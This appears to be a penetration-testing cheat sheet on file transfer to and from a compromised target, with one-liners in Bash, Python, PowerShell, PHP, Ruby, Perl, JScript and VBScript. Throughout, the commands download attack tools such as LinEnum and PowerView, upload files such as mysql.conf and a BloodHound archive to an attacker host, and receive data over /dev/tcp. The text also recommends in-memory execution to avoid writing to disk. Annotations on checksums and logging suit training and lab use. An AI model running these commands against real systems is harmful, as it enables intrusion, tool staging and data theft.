Links

Code

Useful code for transferring files.
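Consider piping downloaded binaries and scripts into something like bash or python to execute them in memory rather than writing them to disk on the target. The raw GitHub URLs used below point at branch heads (master, dev), so their content can change between runs; pin each URL to a specific commit and compare a checksum before executing anything fetched this way. In-memory execution still shows up in process command lines, interpreter logging and network telemetry.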

Bash

This option is useful when few transfer binaries are available on the target. Bash can receive a file on the target when it is sent by a binary running on the attacker machine.
# Receive the file sent by the attacker.
# /dev/tcp/<host>/<port> is a redirection implemented by bash itself (not a real
# device file): bash opens a TCP connection to <KALI IP> on port 443 and cat
# copies whatever arrives into LinEnum.sh.
# The stream is neither encrypted nor authenticated, so compare a checksum of the
# received file with the sender's copy before using it.
cat < /dev/tcp/<KALI IP>/443 > LinEnum.sh

Python2

Useful when Python3 isn't available on a target
# Download a file.
# urllib.urlretrieve is the Python 2 location of this function (Python 3 moved it
# to urllib.request); it writes the response body to LinEnum.sh.
# Nothing here verifies the integrity of the downloaded script.
python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'

Python3

# Upload a file as a multipart form field named "files" via HTTP POST.
# Don't change 'rb': the file has to be opened in binary mode so its bytes are sent as-is.
# requests is a third-party package, so it must already be installed on the host.
# The URL is plain http://, so the file contents cross the network unencrypted.
python3 -c 'import requests;requests.post("http://192.168.127.134:8000/upload",files={"files":open("./mysql.conf","rb")})'
# Download a file to LinEnum.sh using only the standard library (urllib.request).
# Nothing here verifies the integrity of the downloaded script.
python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'

PowerShell

# Download remote file from host with .NET WebClient.DownloadFile(url, localPath),
# run as a one-off command through powershell -c.
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\bob\Desktop\wget.exe')"
# Download remote file from host with the Invoke-WebRequest cmdlet;
# -OutFile writes the response body to the given path.
Invoke-WebRequest http://192.168.127.134:8000/mysql.conf -OutFile .\mysql.conf
# Download remote file from host with BITS (Background Intelligent Transfer Service).
# BITS jobs are recorded in the Microsoft-Windows-Bits-Client/Operational event log.
Import-Module BitsTransfer; Start-BitsTransfer -Source http://192.168.127.134:8000/mysql.conf -Destination .\mysql.conf
# Upload file with BITS through an explicit proxy: -ProxyUsage Override uses the
# server given in -ProxyList, and -ProxyCredential names the account presented to
# that proxy (a bare user name makes PowerShell prompt for the password).
Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://10.10.10.132/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql
# Upload local file to remote host with WebClient.UploadFile(url, localPath).
# "KALI IP" is a placeholder for the receiving host's address.
# Every URL in this section is plain http://, so the transfers are unencrypted.
powershell (New-Object System.Net.WebClient).UploadFile('http://KALI IP/upload.php', 'fileToCopyToKali.docx')

PHP

# Download a file with file_get_contents & file_put_contents.
# The whole response is read into memory before it is written to LinEnum.sh.
# Opening a URL this way requires allow_url_fopen to be enabled in the PHP configuration.
php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'
# Download a file with fopen(), copying it in reads of up to 1024 bytes (BUFFER).
# NOTE(review): neither fopen() result is checked, and the loop condition ends on
# any falsy read - in PHP the string "0" is falsy - so a chunk consisting of exactly
# "0" would stop the copy early; looping on !feof($fremote) avoids that.
php -r 'const BUFFER = 1024; $fremote =
fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

Ruby

# Download a file: Net::HTTP.get returns the response body as a string and
# File.write saves it as LinEnum.sh.
# Net::HTTP.get returns the body whatever the HTTP status is, so an error page
# would be saved as the script; check the file (and its checksum) before use.
ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'

Perl

# Download a file with LWP::Simple's getstore(url, file).
# getstore returns the HTTP status code, which this one-liner discards, so a
# failed download is not reported.
# LWP::Simple comes from the libwww-perl distribution rather than core Perl.
perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'

JavaScript

# Create a file
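// Windows Script Host (JScript) HTTP download helper.
// Arguments: (0) URL to fetch, (1) path of the file to write.
// The response is written exactly as received; no hash or signature is verified,
// so check the saved file against a known checksum before using it.
if (WScript.Arguments.length < 2) {
    WScript.Echo("Usage: cscript.exe /nologo <script>.js <url> <output file>");
    WScript.Quit(1);
}
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
// Only persist a successful response; otherwise an HTTP error page would be
// saved under the requested file name and mistaken for the real content.
if (WinHttpReq.Status < 200 || WinHttpReq.Status >= 300) {
    WScript.Echo("Download failed: HTTP " + WinHttpReq.Status);
    WScript.Quit(1);
}
// Declared with var so the stream is not an implicit global.
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1; // 1 = adTypeBinary: treat the body as raw bytes
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
// No save option is passed, so SaveToFile fails if the destination already exists.
BinStream.SaveToFile(WScript.Arguments(1));
BinStream.Close();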
# Download a file using cscript to run js.
# The script reads two arguments: the URL to fetch and the output file name.
# /nologo suppresses the Windows Script Host banner.
cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1

VBScript

# Create a file
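' Windows Script Host (VBScript) HTTP download helper.
' Arguments: (0) URL to fetch, (1) path of the file to write.
' The response is written exactly as received; no hash or signature is verified,
' so check the saved file against a known checksum before using it.
If WScript.Arguments.Count < 2 Then
    WScript.Echo "Usage: cscript.exe /nologo <script>.vbs <url> <output file>"
    WScript.Quit 1
End If
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
' Only persist a successful response; otherwise an HTTP error page would be
' saved under the requested file name and mistaken for the real content.
If xHttp.Status < 200 Or xHttp.Status >= 300 Then
    WScript.Echo "Download failed: HTTP " & xHttp.Status
    WScript.Quit 1
End If
with bStrm
    .type = 1 ' 1 = adTypeBinary: treat the body as raw bytes
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2 ' 2 = adSaveCreateOverWrite: replaces an existing file
    .close
end with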
# Download file using cscript to run vbs.
# The script reads two arguments: the URL to fetch and the output file name.
# /nologo suppresses the Windows Script Host banner.
cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1